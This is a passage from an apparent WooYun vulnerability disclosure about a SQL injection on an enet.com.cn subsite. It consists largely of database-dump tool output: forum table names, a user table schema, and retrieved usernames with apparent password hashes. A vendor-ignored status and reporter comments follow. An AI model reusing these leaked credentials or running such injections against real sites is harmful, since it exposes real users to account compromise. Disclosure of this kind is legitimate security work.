| nbbbs_promptmsgs                   |
| nbbbs_prompttype                   |
| nbbbs_pushedthreads_copy           |
| nbbbs_ranks                        |
| nbbbs_ratelog                      |
| nbbbs_regips                       |
| nbbbs_relatedthreads               |
| nbbbs_reportlog                    |
| nbbbs_request                      |
| nbbbs_rewardlog                    |
| nbbbs_rsscaches                    |
| nbbbs_searchindex                  |
| nbbbs_sessions                     |
| nbbbs_settings                     |
| nbbbs_smilies                      |
| nbbbs_spacecaches                  |
| nbbbs_stats                        |
| nbbbs_statvars                     |
| nbbbs_styles                       |
| nbbbs_stylevars                    |
| nbbbs_tags                         |
| nbbbs_tasks                        |
| nbbbs_taskvars                     |
| nbbbs_templates                    |
| nbbbs_threads                      |
| nbbbs_threadsmod                   |
| nbbbs_threadtags                   |
| nbbbs_threadtypes                  |
| nbbbs_tradecomments                |
| nbbbs_tradelog                     |
| nbbbs_tradeoptionvars              |
| nbbbs_trades                       |
| nbbbs_typemodels                   |
| nbbbs_typeoptions                  |
| nbbbs_typeoptionvars               |
| nbbbs_typevars                     |
| nbbbs_usergroups                   |
| nbbbs_validating                   |
| nbbbs_warnings                     |
| nbbbs_words                        |
| pcbbs_access                       |
| pcbbs_activities                   |
| pcbbs_activityapplies              |
| pcbbs_addons                       |
| pcbbs_adminactions                 |
| pcbbs_admincustom                  |
| pcbbs_admingroups                  |
| pcbbs_adminnotes                   |
| pcbbs_adminsessions                |
| pcbbs_advertisements               |
| pcbbs_announcements                |
| pcbbs_attachmentfields             |
| pcbbs_attachments                  |
| pcbbs_attachpaymentlog             |
| pcbbs_attachtypes                  |
| pcbbs_banned                       |
| pcbbs_bbcodes                      |
| pcbbs_caches                       |
| pcbbs_creditslog                   |
| pcbbs_crons                        |
| pcbbs_debateposts                  |
| pcbbs_debates                      |
| pcbbs_failedlogins                 |
| pcbbs_faqs                         |
| pcbbs_favoriteforums               |
| pcbbs_favorites                    |
| pcbbs_favoritethreads              |
| pcbbs_feeds                        |
| pcbbs_forumfields                  |
| pcbbs_forumlinks                   |
| pcbbs_forumrecommend               |
| pcbbs_forums                       |
| pcbbs_imagetypes                   |
| pcbbs_invites                      |
| pcbbs_itempool                     |
| pcbbs_magiclog                     |
| pcbbs_magicmarket                  |
| pcbbs_magics                       |
| pcbbs_medallog                     |
| pcbbs_medals                       |
| pcbbs_memberfields                 |
| pcbbs_membermagics                 |
| pcbbs_memberrecommend              |
| pcbbs_members                      |
| pcbbs_memberspaces                 |
| pcbbs_moderators                   |
| pcbbs_modworks                     |
| pcbbs_myposts                      |
| pcbbs_mytasks                      |
| pcbbs_mythreads                    |
| pcbbs_navs                         |
| pcbbs_onlinelist                   |
| pcbbs_onlinetime                   |
| pcbbs_orders                       |
| pcbbs_paymentlog                   |
| pcbbs_pluginhooks                  |
| pcbbs_plugins                      |
| pcbbs_pluginvars                   |
| pcbbs_polloptions                  |
| pcbbs_polls                        |
| pcbbs_postposition                 |
| pcbbs_posts                        |
| pcbbs_profilefields                |
| pcbbs_projects                     |
| pcbbs_promotions                   |
| pcbbs_prompt                       |
| pcbbs_promptmsgs                   |
| pcbbs_prompttype                   |
| pcbbs_ranks                        |
| pcbbs_ratelog                      |
| pcbbs_regips                       |
| pcbbs_relatedthreads               |
| pcbbs_reportlog                    |
| pcbbs_request                      |
| pcbbs_rewardlog                    |
| pcbbs_rsscaches                    |
| pcbbs_searchindex                  |
| pcbbs_sessions                     |
| pcbbs_settings                     |
| pcbbs_smilies                      |
| pcbbs_spacecaches                  |
| pcbbs_stats                        |
| pcbbs_statvars                     |
| pcbbs_styles                       |
| pcbbs_stylevars                    |
| pcbbs_tags                         |
| pcbbs_tasks                        |
| pcbbs_taskvars                     |
| pcbbs_templates                    |
| pcbbs_threads                      |
| pcbbs_threadsmod                   |
| pcbbs_threadtags                   |
| pcbbs_threadtypes                  |
| pcbbs_tradecomments                |
| pcbbs_tradelog                     |
| pcbbs_tradeoptionvars              |
| pcbbs_trades                       |
| pcbbs_typemodels                   |
| pcbbs_typeoptions                  |
| pcbbs_typeoptionvars               |
| pcbbs_typevars                     |
| pcbbs_usergroups                   |
| pcbbs_validating                   |
| pcbbs_warnings                     |
| pcbbs_words                        |
| pre_common_addon                   |
| pre_common_admincp_cmenu           |
| pre_common_admincp_group           |
| pre_common_admincp_member          |
| pre_common_admincp_perm            |
| pre_common_admincp_session         |
| pre_common_admingroup              |
| pre_common_adminnote               |
| pre_common_advertisement           |
| pre_common_advertisement_custom    |
| pre_common_banned                  |
| pre_common_block                   |
| pre_common_block_favorite          |
| pre_common_block_item              |
| pre_common_block_item_data         |
| pre_common_block_permission        |
| pre_common_block_pic               |
| pre_common_block_style             |
| pre_common_block_xml               |
| pre_common_cache                   |
| pre_common_card                    |
| pre_common_card_log                |
| pre_common_card_type               |
| pre_common_credit_log              |
| pre_common_credit_rule             |
| pre_common_credit_rule_log         |
| pre_common_credit_rule_log_field   |
| pre_common_cron                    |
| pre_common_district                |
| pre_common_diy_data                |
| pre_common_domain                  |
| pre_common_failedlogin             |
| pre_common_friendlink              |
| pre_common_grouppm                 |
| pre_common_invite                  |
| pre_common_magic                   |
| pre_common_magiclog                |
| pre_common_mailcron                |
| pre_common_mailqueue               |
| pre_common_member                  |
| pre_common_member_action_log       |
| pre_common_member_connect          |
| pre_common_member_count            |
| pre_common_member_field_forum      |
| pre_common_member_field_home       |
| pre_common_member_grouppm          |
| pre_common_member_log              |
| pre_common_member_magic            |
| pre_common_member_profile          |
| pre_common_member_profile_setting  |
| pre_common_member_security         |
| pre_common_member_stat_field       |
| pre_common_member_stat_fieldcache  |
| pre_common_member_stat_search      |
| pre_common_member_stat_searchcache |
| pre_common_member_status           |
| pre_common_member_validate         |
| pre_common_member_verify           |
| pre_common_member_verify_info      |
| pre_common_moderate                |
| pre_common_myapp                   |
| pre_common_myinvite                |
| pre_common_mytask                  |
| pre_common_nav                     |
| pre_common_onlinetime              |
| pre_common_plugin                  |
| pre_common_pluginvar               |
| pre_common_process                 |
| pre_common_regip                   |
| pre_common_relatedlink             |
| pre_common_report                  |
| pre_common_searchindex             |
| pre_common_secquestion             |
| pre_common_session                 |
| pre_common_setting                 |
| pre_common_smiley                  |
| pre_common_sphinxcounter           |
| pre_common_stat                    |
| pre_common_statuser                |
| pre_common_style                   |
| pre_common_stylevar                |
| pre_common_syscache                |
| pre_common_tag                     |
| pre_common_tagitem                 |
| pre_common_task                    |
| pre_common_taskvar                 |
| pre_common_template                |
| pre_common_template_block          |
| pre_common_template_permission     |
| pre_common_uin_black               |
| pre_common_usergroup               |
| pre_common_usergroup_field         |
| pre_common_word                    |
| pre_common_word_type               |
| pre_connect_feedlog                |
| pre_connect_memberbindlog          |
| pre_connect_tlog                   |
| pre_forum_access                   |
| pre_forum_activity                 |
| pre_forum_activityapply            |
| pre_forum_announcement             |
| pre_forum_attachment               |
| pre_forum_attachment_0             |
| pre_forum_attachment_1             |
| pre_forum_attachment_2             |
| pre_forum_attachment_3             |
| pre_forum_attachment_4             |
| pre_forum_attachment_5             |
| pre_forum_attachment_6             |
| pre_forum_attachment_7             |
| pre_forum_attachment_8             |
| pre_forum_attachment_9             |
| pre_forum_attachment_unused        |
| pre_forum_attachtype               |
| pre_forum_bbcode                   |
| pre_forum_creditslog               |
| pre_forum_debate                   |
| pre_forum_debatepost               |
| pre_forum_faq                      |
| pre_forum_forum                    |
| pre_forum_forum_threadtable        |
| pre_forum_forumfield               |
| pre_forum_forumrecommend           |
| pre_forum_groupcreditslog          |
| pre_forum_groupfield               |
| pre_forum_groupinvite              |
| pre_forum_grouplevel               |
| pre_forum_groupranking             |
| pre_forum_groupuser                |
| pre_forum_imagetype                |
| pre_forum_medal                    |
| pre_forum_medallog                 |
| pre_forum_memberrecommend          |
| pre_forum_moderator                |
| pre_forum_modwork                  |
| pre_forum_onlinelist               |
| pre_forum_order                    |
| pre_forum_poll                     |
| pre_forum_polloption               |
| pre_forum_pollvoter                |
| pre_forum_post                     |
| pre_forum_post_tableid             |
| pre_forum_postcomment              |
| pre_forum_postlog                  |
| pre_forum_postposition             |
| pre_forum_poststick                |
| pre_forum_promotion                |
| pre_forum_ratelog                  |
| pre_forum_relatedthread            |
| pre_forum_replycredit              |
| pre_forum_rsscache                 |
| pre_forum_spacecache               |
| pre_forum_statlog                  |
| pre_forum_thread                   |
| pre_forum_threadclass              |
| pre_forum_threadimage              |
| pre_forum_threadlog                |
| pre_forum_threadmod                |
| pre_forum_threadpartake            |
| pre_forum_threadrush               |
| pre_forum_threadtype               |
| pre_forum_trade                    |
| pre_forum_tradecomment             |
| pre_forum_tradelog                 |
| pre_forum_typeoption               |
| pre_forum_typeoptionvar            |
| pre_forum_typevar                  |
| pre_forum_warning                  |
| pre_home_album                     |
| pre_home_album_category            |
| pre_home_appcreditlog              |
| pre_home_blacklist                 |
| pre_home_blog                      |
| pre_home_blog_category             |
| pre_home_blogfield                 |
| pre_home_class                     |
| pre_home_click                     |
| pre_home_clickuser                 |
| pre_home_comment                   |
| pre_home_docomment                 |
| pre_home_doing                     |
| pre_home_favorite                  |
| pre_home_feed                      |
| pre_home_feed_app                  |
| pre_home_friend                    |
| pre_home_friend_request            |
| pre_home_friendlog                 |
| pre_home_notification              |
| pre_home_pic                       |
| pre_home_picfield                  |
| pre_home_poke                      |
| pre_home_pokearchive               |
| pre_home_share                     |
| pre_home_show                      |
| pre_home_specialuser               |
| pre_home_userapp                   |
| pre_home_userappfield              |
| pre_home_viewlog                   |
| pre_home_visitor                   |
| pre_myrepeats                      |
| pre_portal_article_content         |
| pre_portal_article_count           |
| pre_portal_article_related         |
| pre_portal_article_title           |
| pre_portal_article_trash           |
| pre_portal_attachment              |
| pre_portal_category                |
| pre_portal_category_permission     |
| pre_portal_comment                 |
| pre_portal_rsscache                |
| pre_portal_topic                   |
| pre_portal_topic_pic               |
| pre_tools_censorhome               |
| pre_tools_rule                     |
| user4                              |
| xbbs_access                        |
| xbbs_activities                    |
| xbbs_activityapplies               |
| xbbs_addons                        |
| xbbs_adminactions                  |
| xbbs_admincustom                   |
| xbbs_admingroups                   |
| xbbs_adminnotes                    |
| xbbs_adminsessions                 |
| xbbs_advertisements                |
| xbbs_announcements                 |
| xbbs_attachmentfields              |
| xbbs_attachments                   |
| xbbs_attachpaymentlog              |
| xbbs_attachtypes                   |
| xbbs_banned                        |
| xbbs_bbcodes                       |
| xbbs_caches                        |
| xbbs_creditslog                    |
| xbbs_crons                         |
| xbbs_debateposts                   |
| xbbs_debates                       |
| xbbs_failedlogins                  |
| xbbs_faqs                          |
| xbbs_favoriteforums                |
| xbbs_favorites                     |
| xbbs_favoritethreads               |
| xbbs_feeds                         |
| xbbs_forumfields                   |
| xbbs_forumlinks                    |
| xbbs_forumrecommend                |
| xbbs_forums                        |
| xbbs_imagetypes                    |
| xbbs_invites                       |
| xbbs_itempool                      |
| xbbs_magiclog                      |
| xbbs_magicmarket                   |
| xbbs_magics                        |
| xbbs_medallog                      |
| xbbs_medals                        |
| xbbs_memberfields                  |
| xbbs_membermagics                  |
| xbbs_memberrecommend               |
| xbbs_members                       |
| xbbs_memberspaces                  |
| xbbs_moderators                    |
| xbbs_modworks                      |
| xbbs_myposts                       |
| xbbs_mytasks                       |
| xbbs_mythreads                     |
| xbbs_navs                          |
| xbbs_onlinelist                    |
| xbbs_onlinetime                    |
| xbbs_orders                        |
| xbbs_paymentlog                    |
| xbbs_pluginhooks                   |
| xbbs_plugins                       |
| xbbs_pluginvars                    |
| xbbs_polloptions                   |
| xbbs_polls                         |
| xbbs_postposition                  |
| xbbs_posts                         |
| xbbs_profilefields                 |
| xbbs_projects                      |
| xbbs_promotions                    |
| xbbs_prompt                        |
| xbbs_promptmsgs                    |
| xbbs_prompttype                    |
| xbbs_ranks                         |
| xbbs_ratelog                       |
| xbbs_regips                        |
| xbbs_relatedthreads                |
| xbbs_reportlog                     |
+------------------------------------+
Database: newbbs
Table: uc_members
[13 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| isactive      | tinyint(1)            |
| lastloginip   | char(15)              |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
+---------------+-----------------------+

uc_members的表。

[22:42:34] [INFO] the SQL query used returns 2460210 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over
consistency? [y/N] N
[22:42:40] [INFO] retrieved: 000009112cb0c06feae43a4635f5dfd1
[22:42:42] [INFO] retrieved: zkwen
[22:42:45] [INFO] retrieved: 00000a3f5af8f0d84e87a5e4d7179da6
[22:42:47] [INFO] retrieved: caizhizhi
[22:42:50] [INFO] retrieved: 000017b39f6c2d0bcc06c16641a9df4b
[22:42:52] [INFO] retrieved: ghost2005
[22:42:55] [INFO] retrieved: 0000180e94707c0d90547614c17076bf

同样有200W数据。

漏洞证明：

[22:42:34] [INFO] the SQL query used returns 2460210 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over
consistency? [y/N] N
[22:42:40] [INFO] retrieved: 000009112cb0c06feae43a4635f5dfd1
[22:42:42] [INFO] retrieved: zkwen
[22:42:45] [INFO] retrieved: 00000a3f5af8f0d84e87a5e4d7179da6
[22:42:47] [INFO] retrieved: caizhizhi
[22:42:50] [INFO] retrieved: 000017b39f6c2d0bcc06c16641a9df4b
[22:42:52] [INFO] retrieved: ghost2005
[22:42:55] [INFO] retrieved: 0000180e94707c0d90547614c17076bf

修复方案：

可以选择过滤参数

版权声明：转载请注明来源老和尚@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-10-31 22:48

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

2014-10-30 10:52 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天，我会骑着雨牛@'雨。踩着一哥@jan...)

@finger 哥，帮我催催厂商吧
2014-11-01 00:08 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天，我会骑着雨牛@'雨。踩着一哥@jan...)

妹的。过千万都敢忽略，有本事别修复

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080855

漏洞标题：硅谷动力某子站SQL注射漏洞泄露大量用户数据

相关厂商：enet.com.cn

漏洞作者：老和尚

提交时间：2014-10-26 22:46

修复时间：2014-10-31 22:48

公开时间：2014-10-31 22:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：19

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源老和尚@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-080855

漏洞标题：硅谷动力某子站SQL注射漏洞泄露大量用户数据

相关厂商：enet.com.cn

漏洞作者： 老和尚

提交时间：2014-10-26 22:46

修复时间：2014-10-31 22:48

公开时间：2014-10-31 22:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：19

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-080855"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 老和尚@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：老和尚

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源老和尚@乌云